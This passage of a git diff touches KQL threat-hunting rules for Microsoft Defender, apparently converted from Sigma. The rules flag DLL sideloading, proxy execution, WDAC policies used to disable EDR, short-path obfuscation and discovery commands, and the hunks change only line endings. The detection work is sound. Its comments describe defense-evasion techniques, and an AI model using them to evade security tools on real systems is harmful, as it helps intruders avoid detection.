ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql index 0277d730..674acdb8 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Activity Via ExtExport.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-11-26 -// Level: medium -// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. -// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". -// Arbitrary DLLs can also be loaded if a specific number of flags was provided. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting - -DeviceProcessEvents +// Title: Potential DLL Sideloading Activity Via ExtExport.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-26 +// Level: medium +// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa. +// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll". +// Arbitrary DLLs can also be loaded if a specific number of flags was provided. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting + +DeviceProcessEvents | where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql index a75cc6de..c7b2aa51 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql @@ -1,15 +1,15 @@ -// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative -// Date: 2020-10-05 -// Level: low -// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". -// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. -// While this is often a legitimate action, this rule can be use to hunt for anomalies. -// Muddy Waters threat actor was seeing using this technique. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting -// False Positives: -// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe" - -DeviceProcessEvents +// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: low +// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe". +// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter. +// While this is often a legitimate action, this rule can be use to hunt for anomalies. +// Muddy Waters threat actor was seeing using this technique. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe" + +DeviceProcessEvents | where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql index f7636048..f05c72fa 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql @@ -1,13 +1,13 @@ -// Title: Potential Suspicious Execution From GUID Like Folder Names -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-01 -// Level: low -// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. -// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting -// False Positives: -// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly - -DeviceProcessEvents +// Title: Potential Suspicious Execution From GUID Like Folder Names +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: low +// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks. +// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting +// False Positives: +// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath)))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql index d9e0f02d..241b830e 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql @@ -1,14 +1,14 @@ -// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-12-01 -// Level: medium -// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. -// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. -// These can be used for example in decrypting malicious payload for defense evasion. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting -// False Positives: -// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. - -DeviceRegistryEvents +// Title: Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-12-01 +// Level: medium +// Description: Detects the setting of a registry inside the "\Shell\Open\Command" value with PowerShell classes from the "System.Security.Cryptography" namespace. +// The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. +// These can be used for example in decrypting malicious payload for defense evasion. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.privilege-escalation, attack.t1059.001, attack.t1027.010, attack.t1547.001, detection.threat-hunting +// False Positives: +// - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. + +DeviceRegistryEvents | where RegistryKey contains "\\Shell\\Open\\Command" and (RegistryValueData contains ".AesCryptoServiceProvider" or RegistryValueData contains ".DESCryptoServiceProvider" or RegistryValueData contains ".DSACryptoServiceProvider" or RegistryValueData contains ".RC2CryptoServiceProvider" or RegistryValueData contains ".Rijndael" or RegistryValueData contains ".RSACryptoServiceProvider" or RegistryValueData contains ".TripleDESCryptoServiceProvider") and (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryValueData contains "System.Security.Cryptography." \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql index 3cd4b760..55114655 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql @@ -1,13 +1,13 @@ -// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly -// Author: Andreas Braathen (mnemonic.io) -// Date: 2023-10-17 -// Level: medium -// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting -// False Positives: -// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. -// - Not every instance is considered malicious, but this rule will capture the malicious usages. - -DeviceProcessEvents +// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-17 +// Level: medium +// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting +// False Positives: +// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. +// - Not every instance is considered malicious, but this rule will capture the malicious usages. + +DeviceProcessEvents | where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql index 0e9d4b86..0a47b1af 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql @@ -1,13 +1,13 @@ -// Title: Service Binary in User Controlled Folder -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2022-05-02 -// Level: medium -// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". -// Attackers often use such directories for staging purposes. -// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. -// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting - -DeviceRegistryEvents +// Title: Service Binary in User Controlled Folder +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-05-02 +// Level: medium +// Description: Detects the setting of the "ImagePath" value of a service registry key to a path controlled by a non-administrator user such as "\AppData\" or "\ProgramData\". +// Attackers often use such directories for staging purposes. +// This rule might also trigger on badly written software, where if an attacker controls an auto starting service, they might achieve persistence or privilege escalation. +// Note that while ProgramData is a user controlled folder, software might apply strict ACLs which makes them only accessible to admin users. Remove such folders via filters if you experience a lot of noise. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.threat-hunting + +DeviceRegistryEvents | where ((RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains "\\AppData\\Local\\" or RegistryValueData contains "\\AppData\\Roaming\\") and (RegistryKey contains "ControlSet" and RegistryKey endswith "\\Services*") and RegistryKey endswith "\\ImagePath") and (not((RegistryValueData contains "C:\\ProgramData\\Microsoft\\Windows Defender\\" and (RegistryKey endswith "\\Services\\WinDefend*" or RegistryKey contains "\\Services\\MpKs")))) and (not((((RegistryValueData contains "C:\\Users\\" and RegistryValueData contains "AppData\\Local\\Temp\\MBAMInstallerService.exe") and RegistryKey contains "\\Services\\MBAMInstallerService") or (RegistryValueData contains "C:\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe" and RegistryKey contains "\\Services\\ZoomCptService")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql index 60ecc659..db3b3197 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql @@ -1,10 +1,10 @@ -// Title: Set Files as System Files Using Attrib.EXE -// Author: frack113 -// Date: 2022-02-04 -// Level: low -// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting - -DeviceProcessEvents +// Title: Set Files as System Files Using Attrib.EXE +// Author: frack113 +// Date: 2022-02-04 +// Level: low +// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting + +DeviceProcessEvents | where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql index b3d1d905..d37fc7ef 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql @@ -1,10 +1,10 @@ -// Title: Terminate Linux Process Via Kill -// Author: Tuan Le (NCSGroup) -// Date: 2023-03-16 -// Level: medium -// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting - -DeviceProcessEvents +// Title: Terminate Linux Process Via Kill +// Author: Tuan Le (NCSGroup) +// Date: 2023-03-16 +// Level: medium +// Description: Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562, detection.threat-hunting + +DeviceProcessEvents | where FolderPath endswith "/kill" or FolderPath endswith "/killall" or FolderPath endswith "/pkill" or FolderPath endswith "/xkill" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql index 72cd5fbf..4cb588e6 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql @@ -1,18 +1,18 @@ -// Title: Use Short Name Path in Command Line -// Author: frack113, Nasreddine Bencherchali -// Date: 2022-08-07 -// Level: medium -// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations. -// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs. -// When investigating, examine: -// - Commands using short paths to access sensitive directories or files -// - Web servers on Windows (especially Apache) where short filenames could bypass security controls -// - Correlation with other suspicious behaviors -// - baseline of short name usage in your environment and look for deviations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting -// False Positives: -// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. - -DeviceProcessEvents +// Title: Use Short Name Path in Command Line +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-07 +// Level: medium +// Description: Detects the use of short name paths (8.3 format) in command lines, which can be used to obfuscate paths or access restricted locations. +// Windows creates short 8.3 filenames (like PROGRA~1) for compatibility with MS-DOS-based or 16-bit Windows programs. +// When investigating, examine: +// - Commands using short paths to access sensitive directories or files +// - Web servers on Windows (especially Apache) where short filenames could bypass security controls +// - Correlation with other suspicious behaviors +// - baseline of short name usage in your environment and look for deviations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004, detection.threat-hunting +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process. + +DeviceProcessEvents | where (ProcessCommandLine contains "~1\\" or ProcessCommandLine contains "~2\\") and (not(((InitiatingProcessFolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v") or ((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe")) or (InitiatingProcessFolderPath endswith "\\winget.exe" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\WinGet\\")))) and (not(((InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\GPSoftware\\Directory Opus\\dopus.exe" or InitiatingProcessFolderPath endswith "\\Everything\\Everything.exe" or (ProcessCommandLine contains "C:\\Program Files\\Git\\post-install.bat" or ProcessCommandLine contains "C:\\Program Files\\Git\\cmd\\scalar.exe") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\veeam.backup.shell.exe" or (InitiatingProcessFolderPath endswith "\\WebEx\\webexhost.exe" or ProcessCommandLine contains "\\appdata\\local\\webex\\webex64\\meetings\\wbxreport.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql index 4e321041..84723fd6 100644 --- a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql +++ b/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql @@ -1,12 +1,12 @@ -// Title: WDAC Policy File Creation In CodeIntegrity Folder -// Author: Andreas Braathen (mnemonic.io) -// Date: 2025-01-30 -// Level: medium -// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting -// False Positives: -// - May occur legitimately as part of admin activity, but rarely with interactive elevation. - -DeviceFileEvents +// Title: WDAC Policy File Creation In CodeIntegrity Folder +// Author: Andreas Braathen (mnemonic.io) +// Date: 2025-01-30 +// Level: medium +// Description: Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, detection.threat-hunting +// False Positives: +// - May occur legitimately as part of admin activity, but rarely with interactive elevation. + +DeviceFileEvents | where InitiatingProcessIntegrityLevel =~ "High" and FolderPath contains ":\\Windows\\System32\\CodeIntegrity\\" and (FolderPath endswith ".cip" or FolderPath endswith ".p7b") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql index 577c5378..291edba0 100644 --- a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql +++ b/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql @@ -1,13 +1,13 @@ -// Title: CMD Shell Output Redirect -// Author: frack113 -// Date: 2022-01-22 -// Level: low -// Description: Detects the use of the redirection character ">" to redirect information on the command line. -// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082, detection.threat-hunting -// False Positives: -// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment - -DeviceProcessEvents +// Title: CMD Shell Output Redirect +// Author: frack113 +// Date: 2022-01-22 +// Level: low +// Description: Detects the use of the redirection character ">" to redirect information on the command line. +// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082, detection.threat-hunting +// False Positives: +// - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment + +DeviceProcessEvents | where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql index 72b33b7e..47ec7162 100644 --- a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql +++ b/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql @@ -1,12 +1,12 @@ -// Title: Net.EXE Execution -// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) -// Date: 2019-01-16 -// Level: low -// Description: Detects execution of "Net.EXE". -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting -// False Positives: -// - Likely - -DeviceProcessEvents +// Title: Net.EXE Execution +// Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements) +// Date: 2019-01-16 +// Level: low +// Description: Detects execution of "Net.EXE". +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007, attack.t1049, attack.t1018, attack.t1135, attack.t1201, attack.t1069.001, attack.t1069.002, attack.t1087.001, attack.t1087.002, attack.lateral-movement, attack.t1021.002, attack.s0039, detection.threat-hunting +// False Positives: +// - Likely + +DeviceProcessEvents | where (ProcessCommandLine contains " accounts" or ProcessCommandLine contains " group" or ProcessCommandLine contains " localgroup" or ProcessCommandLine contains " share" or ProcessCommandLine contains " start" or ProcessCommandLine contains " stop " or ProcessCommandLine contains " user" or ProcessCommandLine contains " view") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/process_discovery.kql b/KQL/rules-threat-hunting/Discovery/process_discovery.kql index 42e3ae8a..c8ef2920 100644 --- a/KQL/rules-threat-hunting/Discovery/process_discovery.kql +++ b/KQL/rules-threat-hunting/Discovery/process_discovery.kql @@ -1,13 +1,13 @@ -// Title: Process Discovery -// Author: Ömer Günal, oscd.community, CheraaghiMilad -// Date: 2020-10-06 -// Level: low -// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. -// Information obtained could be used to gain an understanding of common software/applications running on systems within the network -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1057, detection.threat-hunting -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Process Discovery +// Author: Ömer Günal, oscd.community, CheraaghiMilad +// Date: 2020-10-06 +// Level: low +// Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. +// Information obtained could be used to gain an understanding of common software/applications running on systems within the network +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057, detection.threat-hunting +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where FolderPath endswith "/atop" or FolderPath endswith "/htop" or FolderPath endswith "/pgrep" or FolderPath endswith "/ps" or FolderPath endswith "/pstree" or FolderPath endswith "/top" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql index 4fc3d766..91ba6406 100644 --- a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql +++ b/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql @@ -1,13 +1,13 @@ -// Title: SC.EXE Query Execution -// Author: frack113 -// Date: 2021-12-06 -// Level: low -// Description: Detects execution of "sc.exe" to query information about registered services on the system -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1007, detection.threat-hunting -// False Positives: -// - Legitimate query of a service by an administrator to get more information such as the state or PID -// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" - -DeviceProcessEvents +// Title: SC.EXE Query Execution +// Author: frack113 +// Date: 2021-12-06 +// Level: low +// Description: Detects execution of "sc.exe" to query information about registered services on the system +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007, detection.threat-hunting +// False Positives: +// - Legitimate query of a service by an administrator to get more information such as the state or PID +// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" + +DeviceProcessEvents | where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql index 0eba801e..5294fe21 100644 --- a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql +++ b/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Tasklist Discovery Command -// Author: frack113 -// Date: 2021-12-11 -// Level: informational -// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1057, detection.threat-hunting -// False Positives: -// - Likely from users, administrator and different internal and third party applications. - -DeviceProcessEvents +// Title: Suspicious Tasklist Discovery Command +// Author: frack113 +// Date: 2021-12-11 +// Level: informational +// Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1057, detection.threat-hunting +// False Positives: +// - Likely from users, administrator and different internal and third party applications. + +DeviceProcessEvents | where ProcessCommandLine contains "tasklist" or FolderPath endswith "\\tasklist.exe" or ProcessVersionInfoOriginalFileName =~ "tasklist.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql index 9e9e7d55..9e3f60f9 100644 --- a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql +++ b/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql @@ -1,14 +1,14 @@ -// Title: System Information Discovery Via Wmic.EXE -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-12-19 -// Level: low -// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, -// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, -// and GPU driver products/versions. -// MITRE Tactic: Discovery -// Tags: attack.discovery, attack.t1082, detection.threat-hunting -// False Positives: -// - VMWare Tools serviceDiscovery scripts - -DeviceProcessEvents +// Title: System Information Discovery Via Wmic.EXE +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-12-19 +// Level: low +// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, +// including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, +// and GPU driver products/versions. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082, detection.threat-hunting +// False Positives: +// - VMWare Tools serviceDiscovery scripts + +DeviceProcessEvents | where ((ProcessCommandLine contains "caption" or ProcessCommandLine contains "command" or ProcessCommandLine contains "driverversion" or ProcessCommandLine contains "maxcapacity" or ProcessCommandLine contains "name" or ProcessCommandLine contains 